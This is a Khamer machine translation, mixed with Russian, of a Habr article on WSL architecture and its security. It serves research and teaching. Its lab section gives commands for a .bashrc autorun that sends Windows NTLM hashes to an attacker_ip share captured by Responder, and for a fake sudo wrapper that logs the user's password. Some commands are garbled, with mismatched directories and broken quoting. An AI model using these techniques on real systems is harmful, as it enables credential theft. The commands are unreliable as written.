ការពិសោធន៍ WSL ។ ផ្នែកទី 1

ជំរាបសួរ, habr! OTUS បើកដំណើរការវគ្គសិក្សាថ្មីក្នុងខែតុលា "សុវត្ថិភាពលីនុច". នៅក្នុងការរំពឹងទុកនៃការចាប់ផ្តើមនៃវគ្គសិក្សានេះ យើងកំពុងចែករំលែកជាមួយអ្នកនូវអត្ថបទមួយដែលសរសេរដោយគ្រូម្នាក់របស់យើងគឺ Alexander Kolesnikov ។

ក្នុងឆ្នាំ 2016 ក្រុមហ៊ុន Microsoft បានណែនាំបច្ចេកវិទ្យា WSL ថ្មីដល់សហគមន៍ IT (Wខាងក្នុង Subsystem សម្រាប់ Linux) ដែលនៅពេលអនាគតធ្វើឱ្យវាអាចបង្រួបបង្រួមដៃគូប្រកួតប្រជែងដែលមិនអាចផ្សះផ្សាពីមុនបានដែលកំពុងប្រយុទ្ធដើម្បីប្រជាប្រិយភាពក្នុងចំណោមអ្នកប្រើប្រាស់ប្រព័ន្ធប្រតិបត្តិការធម្មតា និងកម្រិតខ្ពស់៖ Windows និង Linux ។ បច្ចេកវិទ្យានេះធ្វើឱ្យវាអាចប្រើឧបករណ៍ Linux OS នៅក្នុងបរិស្ថាន Windows ដោយមិនចាំបាច់ដំណើរការលីនុច ជាឧទាហរណ៍ ដោយប្រើ Multi-boot។ នៅលើ Habr អ្នកអាចរកឃើញអត្ថបទមួយចំនួនធំដែលពិពណ៌នាអំពីអត្ថប្រយោជន៍នៃការប្រើប្រាស់ WSL ។ ទោះជាយ៉ាងណាក៏ដោយ ជាអកុសល នៅពេលបង្កើតអត្ថបទនេះ គ្មានការសិក្សាអំពីសុវត្ថិភាពនៃប្រព័ន្ធប្រតិបត្តិការបែបនេះត្រូវបានរកឃើញនៅលើធនធាននេះទេ។ ការបង្ហោះនេះនឹងក្លាយជាការព្យាយាមកែតម្រូវវា។ អត្ថបទនឹងនិយាយអំពីលក្ខណៈពិសេសនៃស្ថាបត្យកម្ម WSL 1 និង 2 ហើយពិនិត្យមើលឧទាហរណ៍ជាច្រើននៃការវាយប្រហារលើប្រព័ន្ធដោយប្រើបច្ចេកវិទ្យាទាំងនេះ។ អត្ថបទត្រូវបានបែងចែកជា 2 ផ្នែក។ ទីមួយនឹងផ្តល់នូវវិធីសាស្ត្រវាយប្រហារតាមទ្រឹស្តីសំខាន់ៗពីលីនុច និងវីនដូ។ អត្ថបទទីពីរនឹងពាក់ព័ន្ធនឹងការរៀបចំបរិយាកាសសាកល្បង និងបង្កើតការវាយប្រហារឡើងវិញ។

WSL 1: លក្ខណៈស្ថាបត្យកម្ម

សម្រាប់ការជ្រៀតចូលទៅក្នុងបញ្ហាសុវត្ថិភាព WSL ដែលត្រឹមត្រូវបំផុត វាចាំបាច់ក្នុងការកំណត់ការ nuances សំខាន់ៗដែលទាក់ទងនឹងការអនុវត្តប្រព័ន្ធរង។ ភារកិច្ចចម្បងមួយរបស់អ្នកប្រើប្រាស់ដែលត្រូវបានដោះស្រាយដោយ WSL គឺសមត្ថភាពក្នុងការធ្វើការតាមរយៈស្ថានីយលីនុចនៅលើម៉ាស៊ីនដែលដំណើរការប្រព័ន្ធប្រតិបត្តិការ Windows ។ ដូចគ្នានេះផងដែរ ភាពឆបគ្នាដែលបានផ្តល់ជូនគឺមានដើមកំណើតដូច្នេះ លីនុចដែលអាចប្រតិបត្តិបាន (ELFs) អាចដំណើរការដោយផ្ទាល់នៅលើប្រព័ន្ធវីនដូ។ ដើម្បីសម្រេចបាននូវគោលដៅទាំងនេះ ប្រព័ន្ធរងពិសេសមួយត្រូវបានបង្កើតឡើងនៅក្នុង Windows 10 ដែលអនុញ្ញាតឱ្យអ្នកដំណើរការកម្មវិធីលីនុច ដោយប្រើសំណុំនៃការហៅតាមប្រព័ន្ធជាក់លាក់មួយ ដូច្នេះការប៉ុនប៉ងមួយត្រូវបានធ្វើឡើងដើម្បីគូសផែនទីសំណុំនៃ Linux syscalls នៅលើ Windows ។ នេះត្រូវបានអនុវត្តជាក់ស្តែងដោយការបន្ថែមកម្មវិធីបញ្ជាថ្មី និងទម្រង់ដំណើរការថ្មី។ តាមទស្សនៈស្ថាបត្យកម្មមើលទៅដូចនេះ៖

តាមពិត អន្តរកម្មជាមួយប្រព័ន្ធប្រតិបត្តិការលីនុចត្រូវបានរៀបចំឡើងតាមរយៈម៉ូឌុលខឺណែលជាច្រើន និងប្រភេទដំណើរការពិសេសមួយ - pico ។ ពីដ្យាក្រាមខាងលើ អ្នកអាចមើលឃើញថាដំណើរការដែលដំណើរការលើ Linux instance នៅលើ host ត្រូវតែមានដើមកំណើត ហើយត្រូវតែប្រើធនធានដូចគ្នាទៅនឹងកម្មវិធី Windows ធម្មតា។ ប៉ុន្តែតើធ្វើដូចម្តេចដើម្បីសម្រេចបាននេះ? នៅក្នុងគម្រោង Drawbridge ។ គំនិតដំណើរការសម្រាប់វីនដូត្រូវបានបង្កើតឡើងដែលផ្តល់នូវសមាសធាតុចាំបាច់ទាំងអស់នៃប្រព័ន្ធប្រតិបត្តិការ (អាស្រ័យលើកំណែរបស់វា) ដើម្បីដំណើរការកម្មវិធីនៃប្រព័ន្ធប្រតិបត្តិការផ្សេងទៀត។

ចំណាំថាអរូបីដែលបានស្នើឡើងបានធ្វើឱ្យវាមិនអាចផ្តោតលើប្រព័ន្ធប្រតិបត្តិការ (ជាពិសេសវីនដូ) ដែលដំណើរការនៃ OS ផ្សេងទៀតត្រូវបានគេរំពឹងថានឹងចាប់ផ្តើមដំណើរការ ហើយបានស្នើវិធីសាស្រ្តទូទៅមួយ។

ដូច្នេះកម្មវិធីណាមួយនៅក្នុងដំណើរការ pico អាចដំណើរការដោយមិនគិតពីខឺណែល Windows៖

1. បញ្ហានៃភាពឆបគ្នានិងការបកប្រែនៃការហៅទូរស័ព្ទប្រព័ន្ធត្រូវតែត្រូវបានដោះស្រាយដោយអ្នកផ្តល់សេវាពិសេស;
2. ការត្រួតពិនិត្យការចូលប្រើត្រូវតែធ្វើឡើងតាមរយៈ ម៉ូនីទ័រសុវត្ថិភាព។ ម៉ូនីទ័រមានទីតាំងនៅក្នុងខឺណែល ហើយដូច្នេះ Windows ត្រូវការការធ្វើឱ្យប្រសើរឡើងក្នុងទម្រង់ជាកម្មវិធីបញ្ជាថ្មីដែលអាចដើរតួជាអ្នកផ្តល់សេវាសម្រាប់ដំណើរការបែបនេះ។ ដំណើរការ pico គំរូត្រូវបានបង្ហាញតាមគ្រោងការណ៍ខាងក្រោម៖

ដោយសារប្រព័ន្ធឯកសារលីនុចប្រើឯកសារដែលប្រកាន់អក្សរតូចធំ និងឈ្មោះថត ប្រព័ន្ធឯកសារ 2 ប្រភេទត្រូវបានបន្ថែមទៅ Windows ដើម្បីដំណើរការជាមួយ WSL - VolFS និង DriveFS ។ VolFS គឺជាការអនុវត្តនៃប្រព័ន្ធឯកសារលីនុច DriveFS គឺជាប្រព័ន្ធឯកសារដែលដំណើរការដោយយោងទៅតាមច្បាប់របស់វីនដូ ប៉ុន្តែមានលទ្ធភាពជ្រើសរើសករណីងាយយល់។

WSL 2

WSL 1 មានដែនកំណត់មួយចំនួនដែលមិនអនុញ្ញាតឱ្យប្រើវាដើម្បីដោះស្រាយជួរអតិបរមានៃភារកិច្ច៖ ឧទាហរណ៍ វាមិនមានសមត្ថភាពក្នុងការដំណើរការកម្មវិធីលីនុច 32 ប៊ីត ហើយវាមិនអាចប្រើកម្មវិធីបញ្ជាឧបករណ៍បានទេ។ ដូច្នេះនៅឆ្នាំ 2020 WSL 2 ត្រូវបានចេញផ្សាយ ដែលផ្លាស់ប្តូរវិធីសាស្រ្តក្នុងការកសាងប្រព័ន្ធរង។ WSL 2 គឺជាម៉ាស៊ីននិម្មិតដែលត្រូវបានធ្វើឱ្យប្រសើរឡើងដែលផ្គូផ្គងលក្ខណៈនៃការប្រើប្រាស់ធនធានរបស់ WSL 1។ ឥឡូវនេះ អាស្រ័យលើបញ្ហាដែលត្រូវបានដោះស្រាយដោយអ្នកប្រើប្រាស់ Windows OS អ្នកអាចជ្រើសរើសកំណែដែលត្រូវការនៃប្រព័ន្ធរងលីនុច។ ដើម្បីកាត់បន្ថយភាពងាយរងគ្រោះដែលអាចកើតមាន WSL 2 ត្រូវបានអនុវត្តដោយផ្អែកលើ Hyper-V នៅក្នុង Windows 10។ ក្នុងទម្រង់នេះ Windows មានលទ្ធភាពដំណើរការខឺណែលប្រព័ន្ធប្រតិបត្តិការលីនុចដោយឯកោ។ វាគួរអោយចងចាំថាកំណែ 1 នៃ WSL ត្រូវបានណែនាំជាមុខងារបេតា ដែលត្រូវបានគេសន្មត់ថាបង្ហាញទិសដៅនៃការអភិវឌ្ឍន៍វីនដូនៅក្នុងតំបន់នេះ ដូច្នេះការផ្លាស់ប្តូរទៅ Hyper-V គឺជៀសមិនរួច។ ស្ថាបត្យកម្មចុងក្រោយមើលទៅដូចនេះ:

នៅក្នុងកំណែនេះ ខឺណែល Windows និង Linux មានធនធានផ្ទាល់ខ្លួន ហើយចំនុចប្រសព្វមាននៅក្នុងប្រព័ន្ធឯកសារប៉ុណ្ណោះ ប៉ុន្តែចំនុចប្រសព្វនេះមិនពេញលេញទេ។ អន្តរកម្មរវាងប្រព័ន្ធឯកសារត្រូវបានអនុវត្តតាមរយៈម៉ាស៊ីនភ្ញៀវ-ម៉ាស៊ីនរុំរុំដែលដំណើរការដោយប្រើពិធីការ 9P ។

សព្វថ្ងៃនេះក្រុមហ៊ុន Microsoft ផ្តល់នូវសមត្ថភាពក្នុងការប្តូររវាង WSL 1 និង WSL 2 ។ កំណែទាំងពីរមានសម្រាប់ប្រើប្រាស់។

សុវត្ថិភាព WSL

នៅពេលនេះ មានការងារជាច្រើនដែលពិពណ៌នាអំពីវិធីសាស្រ្តមួយចំនួនក្នុងការប្រើប្រាស់ឧបករណ៍ OS ស្របច្បាប់ ដើម្បីវាយប្រហារទំនាក់ទំនងរវាងប្រព័ន្ធរង។ យើងនឹងប្រើស្គ្រីបរបស់ពួកគេដើម្បីពិនិត្យមើលភាពពាក់ព័ន្ធនៃការវាយប្រហារនៅពេលសរសេរ។ បញ្ជីទូទៅនៃការវាយប្រហារ និងសេណារីយ៉ូ៖

1. ការអនុវត្តប្រព័ន្ធឯកសារ៖ សិទ្ធិចូលប្រើ ភាពអាចរកបាននៃថតចែករំលែក/យន្តការផ្លាស់ប្តូរទិន្នន័យ។

ការស្រាវជ្រាវត្រូវបានធ្វើឡើងដើម្បីកំណត់ការរំលោភលើច្បាប់ចូលដំណើរការពី Linux FS->Windows FS, Windows FS->Linux FS. ការស្រាវជ្រាវបានបង្ហាញពីសមត្ថភាពក្នុងការកែប្រែឯកសារដែលបានផ្តល់ឱ្យនៅក្នុង OS គោលដៅ។ ការព្យាយាមក៏ត្រូវបានធ្វើឡើងដើម្បីជំនួស បង្កើតស្ទួន និងលុបផ្នែកនៃប្រព័ន្ធឯកសារ។

សេណារីយ៉ូ៖

• A. ការវាយប្រហារពីប្រព័ន្ធប្រតិបត្តិការ Windows - ការកែប្រែឯកសារពីថត /etc នៃ Linux OS ។
• ខ. ការវាយប្រហារពីប្រព័ន្ធប្រតិបត្តិការលីនុច - ការកែប្រែឯកសារនៅក្នុងថត៖ C:Windows, C:Program Files, C:Users<User>

2. ការអនុវត្តជង់បណ្តាញ។

ការស្រាវជ្រាវត្រូវបានអនុវត្តដោយប្រើឧទាហរណ៍នៃការវាយប្រហារពីប្រព័ន្ធប្រតិបត្តិការលីនុចនៅលើវីនដូ។ លក្ខណៈពិសេសនៃជង់បណ្តាញត្រូវបានប្រើ ពោលគឺយន្តការផ្ទៀងផ្ទាត់លើធនធានផ្សេងៗ។

សេណារីយ៉ូ៖

• ការបើកការចូលទៅកាន់ច្រកដែលត្រូវបានកាន់កាប់នៅលើប្រព័ន្ធវីនដូ
• ការបើកច្រកដោយគ្មានសិទ្ធិសមស្រប
• ដំណើរការសែលបញ្ច្រាសដោយប្រើឯកសារ elf នៅលើប្រព័ន្ធប្រតិបត្តិការ Windows ។

3. លាក់ការចាប់ផ្តើមដំណើរការកម្មវិធីព្យាបាទដោយប្រើប្រព័ន្ធរង WSL ។

ការស្រាវជ្រាវគឺផ្អែកលើការពិតដ៏សាមញ្ញមួយ - ប្រព័ន្ធរងសុវត្ថិភាពមិនអាចស្ទាក់ចាប់ព្រឹត្តិការណ៍នៅក្នុងខឺណែលមួយផ្សេងទៀតដែលដំណើរការដោយប្រើអ្នកផ្តល់សេវាស្របច្បាប់ពីប្រព័ន្ធប្រតិបត្តិការក្នុងករណី WSL 1។ ក្នុងករណី WSL 2 មិនមានវិធីដើម្បីមើលព្រឹត្តិការណ៍ដែលកើតឡើងនោះទេ។ នៅក្នុងខឺណែលដាច់ដោយឡែកមួយនៅក្នុងម៉ាស៊ីននិម្មិតទម្ងន់ស្រាល។

សេណារីយ៉ូ៖

1) បើកដំណើរការកម្មវិធីសម្រាប់ការចូលប្រើពីចម្ងាយទៅកាន់ប្រព័ន្ធ ហើយមើលព្រឹត្តិការណ៍ដែលបានចូល។

ការពិសោធន៍ WSL 1៖ ការស្ទាក់ចាប់ hash (Windows)

ទីបំផុតយើងបានទៅដល់ផ្នែកជាក់ស្តែង។ ដំបូងអ្នកត្រូវរៀបចំបរិយាកាសសាកល្បង។ ការពិសោធន៍ទាំងអស់នឹងត្រូវបានអនុវត្តនៅលើកៅអីមួយជាមួយនឹង Windows 10 2004 ដែលបានដំឡើង។ រូបភាព Ubuntu 18.04 ត្រូវបានជ្រើសរើសជារូបភាពប្រព័ន្ធប្រតិបត្តិការសម្រាប់ WSL ។ រូបភាពត្រូវបានជ្រើសរើសដោយចៃដន្យ ហើយរូបភាពផ្សេងទៀតនឹងដំណើរការដូចគ្នា។ ពាក្យបញ្ជាសម្រាប់ដំឡើងជំហរ៖

ដំបូងអ្នកត្រូវបើកដំណើរការ powershell.exe ជាអ្នកគ្រប់គ្រង។

សម្រាប់ WSL 1 អ្នកត្រូវដំណើរការពាក្យបញ្ជា៖

1. Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux #Включить функцию WSL
2. Invoke-WebRequest -Uri aka.ms/wsl-ubuntu-1804

-OutFile ~/Ubuntu.appx -UseBasicParsing #Загрузить образ Linux из магазина Microsoft

Ubuntu.appx install —root #Установим образ

Возможно, придется прокликать процесс настройки и создать нового пользователя, который будет иметь меньше прав, чем root. Для наших тестов это будет обычный пользователь sam.

Restart-Computer #Перезагрузим

បន្ទាប់ពីចាប់ផ្តើមឧបករណ៍ឈរឡើងវិញ អ្នកអាចហៅពាក្យបញ្ជា bash ។ ប្រសិនបើអ្វីៗដំណើរការបានត្រឹមត្រូវ អ្នកនឹងឃើញលទ្ធផលស្រដៀងគ្នានេះនៅក្នុងកុងសូល Windows៖

យើងនឹងប្រើការចែកចាយ Kali Linux ជាម៉ាស៊ីនរបស់អ្នកវាយប្រហារ ហើយម៉ាស៊ីនទាំងអស់ត្រូវតែស្ថិតនៅលើបណ្តាញមូលដ្ឋានតែមួយ។

ចូរសន្មតថាយើងមានសិទ្ធិចូលប្រើ WSL ដោយមិនមានសិទ្ធិនៅលើម៉ាស៊ីន Windows ។ ចូរយើងព្យាយាមវាយប្រហារប្រព័ន្ធប្រតិបត្តិការលីនុច ដោយហៅពាក្យបញ្ជាពីលីនុច។ ដើម្បីអនុវត្តការវាយប្រហារ យើងនឹងប្រើបច្ចេកទេស autorun ដ៏សាមញ្ញមួយ - យើងនឹងបន្ថែមស្គ្រីបរបស់យើងសម្រាប់ការប្រតិបត្តិនៅក្នុងបរិយាកាសលីនុច។ ដើម្បីធ្វើដូច្នេះអ្នកត្រូវផ្លាស់ប្តូរឯកសារ .bashrc.

នៅលើម៉ាស៊ីនដែលមាន WSL យើងប្រតិបត្តិ៖

	1. bash
	2. Переходим в домашнюю директорию пользователя: cd /home/sam/
	2. echo  «/home/sam/.attack.sh» >> .bashrc
	3. echo «icalcs.exe » \\\\attacker_ip\\shareName\\» > /dev/null 2>&1» >> .attack.sh
	4. chmod u+x .attack.sh
	5. exit

នៅលើម៉ាស៊ីន Kali Linux យើងដំណើរការ៖

1. Responder -I eth0 -rdvw

នៅលើម៉ាស៊ីន Windows សូមបើកដំណើរការ bash ។

យើងកំពុងរង់ចាំលទ្ធផលនៅលើម៉ាស៊ីន Kali Linux៖

ដូច្នេះហើយ យើងទទួលបានអ្នកប្រើប្រាស់ Windows hashes តាមរយៈប្រព័ន្ធរង WSL ដោយប្រតិបត្តិពាក្យបញ្ជានៅលើប្រព័ន្ធលីនុច។

ការពិសោធន៍ WSL 1៖ ការទទួលបានពាក្យសម្ងាត់អ្នកប្រើប្រាស់ (Linux OS)

តោះធ្វើការពិសោធន៍មួយទៀត។ ក្នុងអំឡុងពេលពិនិត្យនេះយើងនឹងបន្ថែមទៅឯកសារ .bashrc ពាក្យ​បញ្ជា​ជា​ច្រើន​ក្នុង​គោល​បំណង​ដើម្បី​ទទួល​បាន​ពាក្យ​សម្ងាត់​អ្នក​ប្រើ​ប្រព័ន្ធ​ប្រតិបត្តិការ Linux ។

តោះចាប់ផ្តើម bash ហើយបញ្ចូលពាក្យបញ្ជា៖

1. mkdir .hidden
2. echo "export PATH=$HOME/.hidden/:$PATH:" >> .bashrc
3. echo "read -sp "[sudo] password for $USER: " sudopass" > .hidden/sudo
4. echo "echo """ >> .mysudo/sudo
5. echo "sleep 2" >> .mysudo/sudo
6. echo "echo "Sorry, try again."" >> .mysudo/sudo
7. echo "echo $sudopass >> /home/sam/.mysudo/pass.txt» >> .mysudo/sudo
8. echo "/usr/bin/sudo $@" >> .mysudo/sudo
9. chmod +x .mysudo/sudo
10. exit

ដើម្បីបញ្ចប់ការវាយប្រហារដោយជោគជ័យ អ្នកប្រើប្រាស់ Sam ត្រូវការហៅ sudo នៅក្នុងស្ថានីយលីនុច។ បន្ទាប់ពីនេះ ពាក្យសម្ងាត់អ្នកប្រើប្រាស់ Linux OS នឹងស្ថិតនៅក្នុងឯកសារ pass.txt:

ការអនុវត្តការវាយប្រហារត្រូវបានផ្តល់ឱ្យសម្រាប់តែព័ត៌មានទ្រឹស្តីប៉ុណ្ណោះ។

ផ្នែកបន្ទាប់នៃអត្ថបទនឹងពណ៌នាអំពីការអនុវត្តពិធីការ 9P ពិចារណាអំពីការបង្កើតម៉ាស៊ីនស្កេនសម្រាប់ពិធីការនេះ និងអនុវត្តការវាយប្រហារដោយប្រើវាផងដែរ។

បញ្ជីអក្សរសិល្ប៍ដែលបានប្រើ

• WSL 2 ការស្រាវជ្រាវទៅជាអាក្រក់
• ប្រព័ន្ធរងវីនដូសម្រាប់ឯកសារលីនុច

អាន​បន្ថែម

• របៀបជ្រើសរើសកម្មវិធីបំណះខឺណែលលីនុច ពេលវេលាពិត

ប្រភព: www.habr.com